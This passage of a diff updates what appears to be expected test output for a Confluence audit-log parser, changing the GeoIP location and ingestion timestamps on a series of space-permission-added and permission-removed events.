-0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -4957,7 +4663,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:08:08.222464260Z", + "ingested": "2021-12-14T14:34:31.513221318Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.596Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"test user\",\"type\":\"User\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"id\":\"2c9680837d4a3682017d4a375a280000\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"EDITSPACE\"},{\"key\":\"User\",\"i18nKey\":\"User\",\"to\":\"admin\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -5042,20 +4748,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -5063,7 +4763,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:08:08.222466165Z", + "ingested": "2021-12-14T14:34:31.513221712Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.592Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-administrators\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"EDITSPACE\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -5141,20 +4841,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -5162,7 +4856,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:08:08.222468196Z", + "ingested": "2021-12-14T14:34:31.513222283Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.588Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"COMMENT\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -5247,20 +4941,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -5268,7 +4956,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:08:08.222470096Z", + "ingested": "2021-12-14T14:34:31.513222664Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.584Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-users\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-users\",\"id\":\"confluence-users\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-users\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"COMMENT\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -5353,20 +5041,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -5374,7 +5056,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:08:08.222471994Z", + "ingested": "2021-12-14T14:34:31.513223111Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.580Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"test user\",\"type\":\"User\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"id\":\"2c9680837d4a3682017d4a375a280000\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"COMMENT\"},{\"key\":\"User\",\"i18nKey\":\"User\",\"to\":\"admin\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -5459,20 +5141,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -5480,7 +5156,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:08:08.222473873Z", + "ingested": "2021-12-14T14:34:31.513223587Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.575Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-administrators\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"COMMENT\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -5558,20 +5234,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -5579,7 +5249,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:08:08.222475758Z", + "ingested": "2021-12-14T14:34:31.513224034Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.571Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"REMOVEOWNCONTENT\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -5664,20 +5334,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -5685,7 +5349,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:08:08.222477662Z", + "ingested": "2021-12-14T14:34:31.513224465Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.567Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-users\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-users\",\"id\":\"confluence-users\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-users\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"REMOVEOWNCONTENT\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -5770,20 +5434,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -5791,7 +5449,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:08:08.222479553Z", + "ingested": "2021-12-14T14:34:31.513224873Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.556Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"test user\",\"type\":\"User\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"id\":\"2c9680837d4a3682017d4a375a280000\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"REMOVEOWNCONTENT\"},{\"key\":\"User\",\"i18nKey\":\"User\",\"to\":\"admin\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -5876,20 +5534,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -5897,7 +5549,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:08:08.222481453Z", + "ingested": "2021-12-14T14:34:31.513225335Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.454Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-administrators\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"REMOVEOWNCONTENT\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -5975,20 +5627,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -5996,7 +5642,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:08:08.222483343Z", + "ingested": "2021-12-14T14:34:31.513225778Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.444Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"Anonymous\",\"type\":\"User\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"VIEWSPACE\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -6081,20 +5727,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -6102,7 +5742,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:08:08.222485236Z", + "ingested": "2021-12-14T14:34:31.513226163Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.435Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-users\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-users\",\"id\":\"confluence-users\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-users\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"VIEWSPACE\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -6187,20 +5827,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -6208,7 +5842,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:08:08.222487138Z", + "ingested": "2021-12-14T14:34:31.513226664Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.424Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"test user\",\"type\":\"User\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"id\":\"2c9680837d4a3682017d4a375a280000\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"VIEWSPACE\"},{\"key\":\"User\",\"i18nKey\":\"User\",\"to\":\"admin\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -6293,20 +5927,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -6314,7 +5942,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.added", - "ingested": "2021-12-08T15:08:08.222489030Z", + "ingested": "2021-12-14T14:34:31.513227049Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.404Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.added\",\"action\":\"Space permission added\"},\"affectedObjects\":[{\"name\":\"confluence-administrators\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-administrators\",\"id\":\"confluence-administrators\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"to\":\"confluence-administrators\"},{\"key\":\"Space\",\"i18nKey\":\"Space\",\"to\":\"ASDF\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"to\":\"VIEWSPACE\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": [ "admin", @@ -6394,20 +6022,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -6415,7 +6037,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-08T15:08:08.222490927Z", + "ingested": "2021-12-14T14:34:31.513227546Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.393Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"confluence-users\",\"type\":\"Group\",\"uri\":\"http://confluence.internal:8090/admin/users/domembersofgroupsearch.action?membersOfGroupTerm=confluence-users\",\"id\":\"confluence-users\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Group\",\"i18nKey\":\"Group\",\"from\":\"confluence-users\"},{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"VIEWSPACE\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -6488,20 +6110,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.143", 
@@ -6509,7 +6125,7 @@ }, "event": { "action": "audit.logging.summary.space.permission.removed", - "ingested": "2021-12-08T15:08:08.222492821Z", + "ingested": "2021-12-14T14:34:31.513228323Z", "original": "{\"timestamp\":\"2021-11-23T00:39:37.375Z\",\"author\":{\"name\":\"test user\",\"type\":\"user\",\"id\":\"2c9680837d4a3682017d4a375a280000\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"avatarUri\":\"\"},\"type\":{\"categoryI18nKey\":\"audit.logging.category.permissions\",\"category\":\"Permissions\",\"actionI18nKey\":\"audit.logging.summary.space.permission.removed\",\"action\":\"Space permission removed\"},\"affectedObjects\":[{\"name\":\"test user\",\"type\":\"User\",\"uri\":\"http://confluence.internal:8090/admin/users/viewuser.action?username=admin\",\"id\":\"2c9680837d4a3682017d4a375a280000\"},{\"name\":\"asdf\",\"type\":\"Space\",\"uri\":\"http://confluence.internal:8090/display/ASDF\",\"id\":\"98306\"}],\"changedValues\":[{\"key\":\"Type\",\"i18nKey\":\"Type\",\"from\":\"VIEWSPACE\"},{\"key\":\"User\",\"i18nKey\":\"User\",\"from\":\"admin\"}],\"source\":\"81.2.69.143\",\"system\":\"http://confluence.internal:8090\",\"method\":\"Browser\",\"extraAttributes\":[]}", "type": "info", "kind": "event" @@ -6582,20 +6198,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": 